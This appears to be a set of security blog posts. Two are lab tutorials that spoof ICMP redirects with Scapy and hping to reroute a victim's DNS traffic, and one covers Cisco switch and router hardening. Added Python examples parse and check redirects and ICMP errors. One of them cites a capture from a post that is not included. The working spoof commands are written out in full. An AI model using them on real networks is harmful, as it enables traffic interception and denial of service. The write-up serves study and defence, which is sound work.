In this scenario, our legitimate router gateway is 192.168.128.2, and our victim/target host is 192.168.128.128. We are going to spoof an ICMP redirect for the /32 host route 10.1.1.1, redirecting that address to the new gateway of 192.168.128.136.<br />
<br />
After installing scapy, we will run as root to ensure that we can craft packets from the attacker's ethernet interface. Along the way, we will instantiate different objects representing the various layer 3 and 4 headers that we require. In this case, we require an IP datagram, with ICMP as well as another IP payload to be delivered inside the ICMP payload.<br />
<br />
<pre>Welcome to Scapy (2.0.0.5 beta)
>>> ip=IP()
>>> ip.src='192.168.128.2'
>>> ip.dst='192.168.128.128'
>>> ip.display
&lt;bound method IP.display of &lt;IP src=192.168.128.2 dst=192.168.128.128 |&gt;&gt;
</pre><br />
Now, we go forward and set the ICMP parameters as follows, type=5 for redirect, and code=1 for host, and then set the gateway destination.<br />
<br />
<pre>>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='192.168.128.136'
>>> icmp.display
&lt;bound method ICMP.display of &lt;ICMP type=redirect code=1 gw=192.168.128.136 |&gt;&gt;
>>> icmp.display()
###[ ICMP ]###
type= redirect
code= 1
chksum= 0x0
gw= 192.168.128.136
</pre><br />
I deliberately used two different methods for displaying the ICMP object properties to illustrate that you can display either the full header or only the modified fields. <br />
<br />
At this stage, we need to create the payload of the ICMP packet itself. This is important because the IP destination address is what becomes the route table host entry when the redirect is sent to the victim. We will set the IP source address within the ICMP payload to be the victim host address since this "would have been" the originator of the packet that elicited the ICMP redirect in a legitimate situation.<br />
<br />
<pre>>>> ip2=IP()
>>> ip2.src='192.168.128.128'
>>> ip2.dst='10.1.1.1'
>>> ip2.display
&lt;bound method IP.display of &lt;IP src=192.168.128.128 dst=10.1.1.1 |&gt;&gt;
</pre><br />
<br />
The layer 4 portion of the ICMP payload can be anything we like. In this example, we will use Scapy's UDP() method which defaults to looking a lot like a DNS header. Since the defaults are pretty good, we don't need to use a Scapy variable. We can send out our ICMP datagram because it is now fully assembled!<br />
<br />
<pre>>>> send(ip/icmp/ip2/UDP())
.
Sent 1 packets.
>>> 
</pre><br />
<br />
When packet crafting for research or especially penetration testing work, you should always have 'tcpdump' running and at minimum displaying packet data, if not writing it to disk:<br />
<br />
<pre>sudo tcpdump -ennvvX -i eth0 -s1514 'icmp'
[sudo] password for deadlist: 
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1514 bytes
08:55:19.971914 00:0c:29:e3:3f:d3 > 00:0c:29:4d:99:8f, ethertype IPv4 (0x0800), length 70: (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto ICMP (1), length 56)
    192.168.128.2 > 192.168.128.128: ICMP redirect 10.1.1.1 to host 192.168.128.136, length 36
    (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 28)
    192.168.128.128.53 > 10.1.1.1.53: [udp sum ok] [|domain]
    0x0000:  4500 0038 0001 0000 4001 f8f0 c0a8 8002  E..8....@.......
    0x0010:  c0a8 8080 0501 0612 c0a8 8088 4500 001c  ............E...
    0x0020:  0001 0000 4011 2ea6 c0a8 8080 0a01 0101  ....@...........
    0x0030:  0035 0035 0008 b349                      .5.5...I
</pre><br />
<br />
And there we have it folks! Scapy is a fascinating tool for exploring all sorts of packet crafting ideas, and because it's Python, you can have lots of fun scripting things to your heart's content.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2320276621879394553.post-10623774489106153532010-05-26T12:54:00.000-07:002010-06-08T08:06:12.945-07:00Spoofing ICMP redirect host messages with hpingAn ICMP redirect host message can be sent by any router on the same broadcast segment as the end host that "needs redirection". Modern network infrastructures typically have a single router gateway address per subnet; however, it is possible to have more than one router in a segment, which is the operational case for ICMP redirect messages.<br />
<br />
An ICMP redirect host message has ICMP type 5, code 1. The ICMP redirect network code is 0. There also exists redirect with Type of Service (ToS) for both network and host (codes 2 and 3).<br />
<br />
With the advent of Classless Inter-Domain Routing (CIDR, RFC 1518/1519 in 1993), an end host cannot readily determine the network class, and thus ICMP type 5, code 0 is basically useless. RFC 1812 additionally states that a router should not generate type 5, code 0. While working on this post, I observed that a Windows host will accept code 0 and treat it the same as code 1, adding a /32 route to the table. <br />
<br />
Because IP source address spoofing is trivial, ICMP redirect message abuse potential exists. The only specific limitation is that the "new" destination gateway address of the redirect message must exist within the same subnet as the end host itself.<br />
<br />
The ICMP redirect use case would most likely be employed in a network penetration testing scenario whereby extensive layer 2 security features are enabled limiting the effectiveness of layer 2 attacks such as ARP cache poisoning and rogue DHCP server use. The primary goal being to intercept traffic for a specific destination address.<br />
<br />
The end host must be configured to accept ICMP redirect messages and update its routing table accordingly. Within Microsoft Windows, a registry value controls the acceptance of ICMP redirect messages. This DWORD value has a default setting of 0x0001, that being the "enabled" state. <br />
<br />
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\EnableICMPRedirect<br />
<br />
Based on my reading, I believe some implementations of the Microsoft TCP/IP stack also read the plural form of this key "EnableICMPRedirects" rather than the singular form, so it is possible that both keys exist.<br />
<br />
With regard to the Windows XP firewall, it will block all ICMP requests in its default configuration state. Of course, there may be site wide group policy that changes this situation for legitimate operational reasons such as multiple router gateways existing in a single segment. If you wish to experiment, and enable 'icmp redirect' from the command line, there are two useful 'netsh' commands as follows:<br />
<br />
C:\> netsh firewall show icmpsetting<br />
<br />
shows the current state of ICMP acceptance if any. A blank output indicates that no ICMP policies are in effect.<br />
<br />
C:\> netsh firewall set icmpsetting type=5 mode=enable<br />
<br />
will enable the acceptance of ICMP redirects through the firewall.<br />
<br />
<br />
The Linux kernel has two settings that control ICMP redirect acceptance behavior. For the 'eth0' interface, these settings are as follows:<br />
<br />
/proc/sys/net/ipv4/conf/eth0/accept_redirects<br />
/proc/sys/net/ipv4/conf/eth0/secure_redirects<br />
<br />
If "secure_redirects" is enabled, the Linux system will only accept ICMP redirects that point to a gateway already listed in the routing table. This is the default in most modern Linux distributions and is an effective defense against spoofing attempts.<br />
<br />
'accept_redirects' is enabled by default also. If the 'secure_redirects' kernel parameter is set to 0, then the Linux kernel is susceptible to an ICMP host redirect attack in the same way that a Windows system is. The one thing to note is that the Linux kernel will not show the accepted route in the routing table listed by the 'ip route show' or 'netstat -nr' commands, even though the route is in effect.<br />
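The host-side acceptance checks just described, applied to the redirect datagram captured with tcpdump in the Scapy post above, as an added Python example (not from the original post, and not hping or Scapy code): it decodes the hex dump into the outer IP header, the ICMP type/code and gateway, and the embedded IP header, verifies both checksums, and then evaluates the redirect against the receiving host's address and known gateways, with the secure_redirects flag switching between the Linux default and the permissive behaviour the post describes for Windows. The 10-minute route lifetime and the ToS redirect codes 2 and 3 are not modeled.<br />

```python
import ipaddress
import struct

# Constructed from the tcpdump hex dump of the spoofed redirect in the Scapy post above:
# outer IPv4 header, ICMP redirect (type 5, code 1), embedded IPv4 header and UDP header.
REDIRECT_PKT = bytes.fromhex(
    "4500 0038 0001 0000 4001 f8f0 c0a8 8002"
    "c0a8 8080 0501 0612 c0a8 8088 4500 001c"
    "0001 0000 4011 2ea6 c0a8 8080 0a01 0101"
    "0035 0035 0008 b349"
)


def inet_checksum(data):
    """RFC 1071 ones'-complement checksum; a block whose stored checksum is correct sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_icmp_redirect(pkt):
    """Decode an IPv4 datagram carrying an ICMP redirect; raise ValueError for anything else."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not an IPv4 datagram")
    ihl = (pkt[0] & 0x0F) * 4
    total_len, = struct.unpack_from("!H", pkt, 2)
    if ihl < 20 or total_len > len(pkt) or total_len < ihl + 8:
        raise ValueError("inconsistent IPv4 lengths")
    if pkt[9] != 1:
        raise ValueError("IP protocol %d is not ICMP" % pkt[9])
    if inet_checksum(pkt[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    icmp = pkt[ihl:total_len]
    if icmp[0] != 5:
        raise ValueError("ICMP type %d is not a redirect" % icmp[0])
    if inet_checksum(icmp) != 0:
        raise ValueError("bad ICMP checksum")
    inner = icmp[8:]                 # header of the datagram that supposedly triggered this
    if len(inner) < 20:
        raise ValueError("truncated embedded datagram")
    return {
        "src": ipaddress.IPv4Address(pkt[12:16]),
        "dst": ipaddress.IPv4Address(pkt[16:20]),
        "code": icmp[1],             # 0 network, 1 host, 2 and 3 the ToS variants
        "gateway": ipaddress.IPv4Address(icmp[4:8]),
        "inner_src": ipaddress.IPv4Address(inner[12:16]),
        "inner_dst": ipaddress.IPv4Address(inner[16:20]),
        "inner_proto": inner[9],
    }


def try_parse_icmp_redirect(pkt):
    """Same as parse_icmp_redirect, but return None instead of raising."""
    try:
        return parse_icmp_redirect(pkt)
    except ValueError:
        return None


def evaluate_redirect(info, host_cidr, gateways, secure_redirects=True):
    """Return the reasons a receiving host should ignore the redirect (empty list = accept).

    host_cidr: the host's own interface address with prefix, e.g. "192.168.128.128/24".
    gateways: next-hop addresses already present in the host's routing table.
    secure_redirects=True mirrors the Linux default described in the post; False is the
    accept_redirects=1, secure_redirects=0 case, which the post says matches Windows.
    """
    host = ipaddress.IPv4Interface(host_cidr)
    known = {ipaddress.IPv4Address(g) for g in gateways}
    reasons = []
    if info["dst"] != host.ip:
        reasons.append("redirect is not addressed to this host")
    if info["src"] not in known:
        reasons.append("sender %s is not a gateway this host uses" % info["src"])
    if info["inner_src"] != host.ip:          # the same sanity check hping's --icmp-ipsrc targets
        reasons.append("embedded datagram was not sent by this host")
    if info["gateway"] not in host.network:   # the new next hop must be on-link
        reasons.append("new gateway %s is not on the local subnet" % info["gateway"])
    if secure_redirects and info["gateway"] not in known:
        reasons.append("new gateway %s is not an existing gateway (secure_redirects)" % info["gateway"])
    return reasons


if __name__ == "__main__":
    info = parse_icmp_redirect(REDIRECT_PKT)
    print("%(src)s says: reach %(inner_dst)s via %(gateway)s (code %(code)d)" % info)
    for secure in (True, False):
        verdict = evaluate_redirect(info, "192.168.128.128/24", ["192.168.128.2"], secure)
        print("secure_redirects=%s -> %s" % (secure, verdict or "accepted"))
```
<br />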
<br />
<br />
Our scenario below is laid out as follows:<br />
<br />
Attacker IP Address: 172.16.235.99<br />
Legitimate Router Gateway: 172.16.235.1<br />
Victim IP Address: 172.16.235.100<br />
<br />
The legitimate DNS server address is 10.1.1.1.<br />
<br />
We can use ICMP redirect host to insert a new route table entry for the 10.1.1.1 address as follows:<br />
<br />
hping -I eth-dest -C 5 -K 1 -a 172.16.235.1 --icmp-ipdst 10.1.1.1 --icmp-gw 172.16.235.99 --icmp-ipsrc 172.16.235.100 172.16.235.100<br />
<br />
whereby:<br />
-I eth-dest is the ethernet interface on the attacker to send the packets out of.<br />
-a &lt;ip&gt; is the spoofed source address of the legitimate router gateway.<br />
--icmp-ipdst &lt;ip&gt; is the new route table entry address you want to create.<br />
--icmp-gw &lt;ip&gt; is the new route destination address/gateway you want to create, and must live within the same subnet as the victim.<br />
--icmp-ipsrc &lt;ip&gt; must match the source address of the victim to pass sanity checking.<br />
<br />
If you check the route table on the victim using "netstat -nr" or "route print" after executing this command from the attacker, you should see a new route table entry. Since MS-Windows will readily accept these new route table entries, many ICMP redirects can be generated with random IPv4 prefixes to perform a denial of service against the target. A /32 host route learned via an ICMP redirect message will remain in the routing table for 10 minutes.<br />
<br />
In this example, we assumed that the attacker was on the same subnet in order to receive / intercept the traffic. In other words, the attacker would also be a DNS server ready to serve some bogus response to the victim. The attacking host could well be a different machine on another network, but the "man in the middle" host or "router gateway" if you like needs to remain on the same subnet in order to receive the traffic.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2320276621879394553.post-62828435328173113572010-05-05T08:41:00.000-07:002010-06-04T14:07:11.374-07:00Network Infrastructure Defense Really Matters!<div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">In today’s world of focused client side device attacks, many security analysts and network security engineers have lost sight of defense configurations that can really make a sizable impact in slowing down network intrusion activity. This article is about network infrastructure precautions that, when sensibly deployed, can assist greatly in defense posture. I will focus both on general recommendations and specific Cisco features in the enterprise LAN space.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><u><b>Network Access / Layer 2 Defenses</b></u></span></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>1. DHCP Protocol Snooping</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,&quot;Times New Roman&quot;,serif;">The DHCP snooping feature is very effective at preventing rogue DHCP servers from operating on a network. A rogue DHCP server is most dangerous for its ability to deliver alternative Domain Name Server (DNS) addresses. The alternate DNS servers will of course deliver whatever custom DNS responses are needed to intercept important traffic, redirect traffic to fake websites, etc. A rogue DHCP server's responses will typically beat the response time of a central DHCP server because of its layer 2 network adjacency.</div><div style="font-family: Georgia,&quot;Times New Roman&quot;,serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Most networks will have centrally deployed DHCP server(s) for IP address delivery. The DHCP snooping feature ensures that DHCP responses can only be transmitted from “trusted” network interfaces, usually interfaces which are uplinks to the core network infrastructure. This technology can be deployed on a per-Virtual LAN (VLAN) basis assuming the feature is present on the specific switch model in hand. (Cisco 3560/3750 switches make this feature available)</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">If a “non-trusted” switch port receives a DHCP RESPONSE, or DHCP ACK packet, it can be configured to shutdown.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">A side effect of deploying this feature is that a tracking table is built within the switch containing details such as the client IP address and MAC/Ethernet address information.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>2. Dynamic Address Resolution Protocol (ARP) Inspection (DAI)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,&quot;Times New Roman&quot;,serif;">DAI leverages the DHCP snooping table to ensure that the IP address to MAC address mapping is consistent. It also has a denial of service (DoS) prevention feature to limit the rate of ARP packets on a network segment. DAI is very effective against broadcast gratuitous ARP traffic, typically used for traffic interception purposes by tools like “Ettercap” and “Cain &amp; Abel”.</div><div style="font-family: Georgia,&quot;Times New Roman&quot;,serif;"></div><div style="font-family: Georgia,&quot;Times New Roman&quot;,serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>3. IP Source Guard</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Again, we leverage the DHCP snooping table and place a dynamic IP access list on ingress traffic to ensure that the source IP address for all packets on any one switch interface is indeed the system connected to this port.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>4. Switchport Security</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Essential to prevent the Content Addressable Memory (CAM) table from being flooded. All network switches track the bridging destination of a packet by its destination MAC address. The MAC addresses are placed into the CAM table, which has a fixed / limited maximum size. On a typical Cisco switch, the CAM table defaults to 6,000 MAC address entries in the switch's default mode. If the switch is optimized for desktop VLAN based switching, higher end switch models (such as the Catalyst 3750) can contain a maximum of 12,000 CAM entries.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">When the CAM table on a switch is filled up, the switch will flood/transmit all Ethernet frames out of all switch ports. It is a relatively trivial matter to write code to generate packets to random Ethernet destinations and thus quickly fill a switch CAM table. The goal is to effectively turn the switch into a hub and enable traffic interception.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">If a switch can be configured to limit the number of CAM entries permitted on any single port, the CAM flooding attack is defeated.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>5. Broadcast Suppression (storm control)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">End devices generate broadcasts that are typically associated with ARP traffic. On a gigabit enabled Ethernet port, a 1% broadcast suppression level still leaves open the potential for up to 10Mbps of broadcast traffic. On a Cisco device, we can suppress down to 1% of link speed using “storm-control broadcast level 1”. Multicast can also be suppressed independently from broadcast on some devices.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">In environments where multicast is in production use, network engineers need to assess the level of multicast required to/from any one access port and then suppress at that level.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Broadcast suppression is critical in avoiding denial of service (DoS) conditions that can either be created by operational errors, or by a security incident / malware.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><u><b>Routing / Layer 3 Defenses</b></u></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Thinking in terms of “defense in depth”, layer 3 defenses act as a backup to the layer 2 defenses in place at the access layer of the network. Layer 3 defenses can be sub-divided into routing device protection (denial of service and infrastructure mapping protection), and network infrastructure protection. We will first consider the network infrastructure category.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>1. Disable Proxy ARP (no ip proxy-arp)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Proxy ARP is a feature which allows the router to act as proxy for any host in its adjacent sub-network. When enabled, proxy ARP allows an end host, with an IP address that falls within the sub-network address range, to set its sub-network mask (and broadcast) to almost anything, and still be able to communicate on the network. An end host could even set the smallest mask possible, eliminate a router gateway setting, and still be able to surf the entire IPv4 address space.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">The end host is allowed to logically appear on almost any network due to the router “proxying” address resolution of all things for that host. It can be used for denial of service attacks amongst other things.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>2. Unicast Reverse Path Forwarding (uRPF) Sanity Check</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">The uRPF check ensures that the source IP address is reachable from the router interface that received the IP datagram. Cisco devices implement two forms of uRPF check; the strict form which looks at the specific interface the datagram is received on, versus the looser check which will match on any connected interface. The uRPF check is another critical measure which forms a “belt and suspenders” style backup to the IP Source Guard feature in order to defeat source IP address forgery/spoofing.<br />
<br />
Two Cisco IOS statements can be used to enforce uRPF sanity checking as follows:<br />
<br />
ip verify unicast source reachable-via rx<br />
ip verify unicast source reachable-via any</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
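The two modes, as an added Python example (not Cisco code and not from the original post): a longest-prefix lookup over a constructed forwarding table, with the strict check requiring that the best route back to the source leaves via the ingress interface, and the loose check only requiring that some route back exists. Interfaces and addresses are invented for the demonstration.

```python
# Added example (not Cisco's code or the original post's): strict versus loose
# unicast RPF evaluated against a small forwarding table. The FIB, interfaces
# and addresses are constructed; a default route is deliberately left out so
# that the loose check has something to reject.
import ipaddress

FIB = [
    ("10.1.0.0/16", "Gi0/1"),
    ("10.1.5.0/24", "Gi0/2"),   # more specific route out a different interface
    ("192.0.2.0/24", "Gi0/3"),
]


def lookup(address: str, fib=FIB):
    """Longest-prefix match: return (network, egress interface) or None."""
    addr = ipaddress.ip_address(address)
    best = None
    for prefix, iface in fib:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best


def urpf(src: str, ingress: str, mode: str, fib=FIB) -> bool:
    """True if a datagram with source `src` arriving on `ingress` passes.
    strict (reachable-via rx):  the best route back to src must point at ingress.
    loose  (reachable-via any): any route back to src is enough."""
    route = lookup(src, fib)
    if route is None:
        return False  # no route back to the source: dropped in both modes
    if mode == "loose":
        return True
    if mode == "strict":
        return route[1] == ingress
    raise ValueError(f"unknown uRPF mode {mode!r}")


# Constructed arrivals: (source address, ingress interface)
SAMPLES = [
    ("10.1.5.7", "Gi0/2"),      # symmetric path: passes both checks
    ("10.1.5.7", "Gi0/1"),      # asymmetric routing: strict drops a legitimate host
    ("10.1.9.9", "Gi0/1"),      # covered only by the /16
    ("203.0.113.9", "Gi0/3"),   # no route back at all: a spoofed source
]


def evaluate(samples=SAMPLES):
    """Return [(src, ingress, strict_passes, loose_passes), ...]."""
    return [(s, i, urpf(s, i, "strict"), urpf(s, i, "loose")) for s, i in samples]


if __name__ == "__main__":
    for src, ingress, strict, loose in evaluate():
        print(f"{src:>14} via {ingress}: strict={'pass' if strict else 'drop'} "
              f"loose={'pass' if loose else 'drop'}")
```

The second sample is the reason both modes exist: a legitimate host behind an asymmetric return path fails the strict check, so strict belongs on access-facing interfaces with a single return path, while loose is the safe choice on multi-homed edges.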
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>3. Disable forwarding of IP Options (no ip options)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">There are virtually no IPv4 datagrams on the network that require any IP options. The most dangerous IP options from a security perspective are:</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><u>Strict Source Route</u>: dictate which router hops a datagram must traverse, and record them.</div><div style="font-family: Georgia,"Times New Roman",serif;"><u>Loose Source Route</u>: specify optional router hops a datagram can traverse and record them.</div><div style="font-family: Georgia,"Times New Roman",serif;"><u>Record Route</u>: simply record the router hops a datagram must traverse.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">If record route IP options are permitted to be forwarded, they can be used for both reconnaissance and traffic interception purposes. In multicast rich environments, operators need to take note that the “Router Urgent” IP option is used within Internet Group Management Protocol (IGMP) transactions.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>4. Disable generation of ICMP type 3, destination unreachable messages (no ip unreachables)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">A router that generates ICMP type 3 (unreachable) messages becomes a source of network reconnaissance information. For example:</div><div style="font-family: Georgia,"Times New Roman",serif;">(a) Type 3, code 0 – “Network Unreachable” can be used to map the internal sub-netting of a network.</div><div style="font-family: Georgia,"Times New Roman",serif;">(b) Type 3, code 1 – “Host Unreachable” can be used to discover individual hosts within a sub-network.</div><div style="font-family: Georgia,"Times New Roman",serif;">(c) Type 3, code 13 – “Administratively prohibited” is generated in the context of router Access Control List (ACL) deny statements, and thus can be used to fully map an access control list.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
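To see what the reconnaissance value of these messages looks like on the wire, here is an added Python decoder (not part of the original post) for ICMP type 3 and type 12 errors, including the quoted original datagram and both checksums. It is run on the 68-byte ICMP parameter problem reply from the tcpdump capture in the Windows 7 post further down this page, and on a type 3 code 13 message constructed here to show what an ACL deny with ip unreachables left enabled gives away: the exact source, destination, protocol and ports that were denied.

```python
# Added example, not from the original post: decode an ICMPv4 error message
# (type 3 destination unreachable, type 12 parameter problem) together with the
# original datagram it quotes, verifying both checksums. CAPTURE is the 68-byte
# "parameter problem" reply shown in the tcpdump output of the Windows 7 post
# on this page; the type 3 message is constructed here for contrast.
import struct
from ipaddress import IPv4Address

CAPTURE = bytes.fromhex(
    "4500 0044 5078 0000 8001 a06d c0a8 6481"
    "c0a8 6401 0c00 3dec 0000 0002 4500 0028"
    "09a4 2000 4006 0759 c0a8 6401 c0a8 6481"
    "01bd 01bd 38a8 7943 2ede 4647 5002 0200"
    "3984 0000"
)
UNREACHABLE_CODES = {0: "net unreachable", 1: "host unreachable", 2: "protocol unreachable",
                     3: "port unreachable", 4: "fragmentation needed and DF set",
                     13: "communication administratively prohibited"}
PARAMETER_PROBLEM_CODES = {0: "pointer indicates the error", 1: "missing a required option",
                           2: "bad length"}


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum. Over a header that already contains a
    valid checksum the result is 0, which is how the parsers verify below."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_ipv4(data: bytes) -> dict:
    """Fixed 20-byte header fields plus the payload up to total length."""
    (ver_ihl, _tos, total_len, ident, flags_frag, ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", data[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {"version": ver_ihl >> 4, "ihl": ihl, "total_length": total_len, "id": ident,
            "df": bool(flags_frag & 0x4000), "mf": bool(flags_frag & 0x2000),
            "frag_offset": flags_frag & 0x1FFF, "ttl": ttl, "proto": proto,
            "src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
            "header_checksum_ok": inet_checksum(data[:ihl]) == 0,
            "payload": data[ihl:total_len]}


def parse_icmp_error(packet: bytes) -> dict:
    """Outer IP header, ICMP header, then the quoted offending datagram
    (its IP header and the first 8 bytes of its transport header)."""
    outer = parse_ipv4(packet)
    if outer["proto"] != 1:
        raise ValueError("not an ICMP datagram")
    icmp = outer["payload"]
    icmp_type, code, _csum, rest = struct.unpack("!BBHI", icmp[:8])
    info = {"outer": outer, "type": icmp_type, "code": code,
            "icmp_checksum_ok": inet_checksum(icmp) == 0}
    if icmp_type == 3:
        info["meaning"] = UNREACHABLE_CODES.get(code, "unknown code")
    elif icmp_type == 12:
        info["meaning"] = PARAMETER_PROBLEM_CODES.get(code, "unknown code")
        info["pointer"] = rest >> 24  # offset of the offending octet in the quoted header
    else:
        raise ValueError(f"ICMP type {icmp_type} is not handled here")
    quoted = parse_ipv4(icmp[8:])
    # only 8 bytes of transport header are quoted: enough for the ports
    quoted["sport"], quoted["dport"] = struct.unpack("!HH", quoted["payload"][:4])
    info["quoted"] = quoted
    return info


def build_icmp_error(src: str, dst: str, icmp_type: int, code: int, offending: bytes) -> bytes:
    """What a router emits: ICMP header + first 28 bytes of the offending
    datagram, wrapped in a fresh IP header, both checksums computed."""
    icmp = struct.pack("!BBHI", icmp_type, code, 0, 0) + offending[:28]
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x1234, 0, 64, 1, 0,
                      IPv4Address(src).packed, IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]
    return hdr + icmp


def describe(info: dict) -> str:
    o, q = info["outer"], info["quoted"]
    return (f"{o['src']} -> {o['dst']}: ICMP type {info['type']} code {info['code']} "
            f"({info['meaning']}) about {q['src']}:{q['sport']} -> {q['dst']}:{q['dport']} "
            f"proto {q['proto']} id {q['id']} MF={q['mf']}")


if __name__ == "__main__":
    print(describe(parse_icmp_error(CAPTURE)))
    # constructed type 3 / code 13: what an ACL deny returns when ip unreachables stays on
    prohibited = build_icmp_error("10.0.0.1", "192.168.100.1", 3, 13, CAPTURE[28:])
    print(describe(parse_icmp_error(prohibited)))
```

Both checksums in the captured reply verify, and the quoted header carries the MF bit of the probe exactly as tcpdump reported; the constructed type 3 code 13 message shows why "no ip unreachables" matters on a filtering interface: the denied flow's 5-tuple comes straight back to whoever sent it.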
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>5. Disable directed broadcast (no ip directed-broadcast)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">A directed broadcast is generated when a datagram is addressed to a network address or to a network broadcast address. If we take the class C network of 192.168.99.0/24 and send a datagram to either the 192.168.99.0 or 192.168.99.255 address from outside of that sub-network, then the router interface will typically broadcast the datagram within the network segment/broadcast domain.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">This represents a security risk in terms of potential network amplification attacks. A common attack from past history was to generate an ICMP ECHO datagram with a spoofed source IP address to a network broadcast address, and subsequently have ALL hosts within that sub-network respond with ICMP ECHO REPLY datagrams. This attack was commonly referred to as a “Smurf” attack.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">There are some protocols which depend on directed broadcast to function properly. Wake On LAN (WOL) is one particular protocol which depends on being able to send UDP datagrams that contain MAC address payloads to a network broadcast address. If your environment requires WOL functionality, you can either filter directed broadcast by source address (for limited risk mitigation), or ensure that the WOL traffic is only generated within the network broadcast domain that will receive it.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
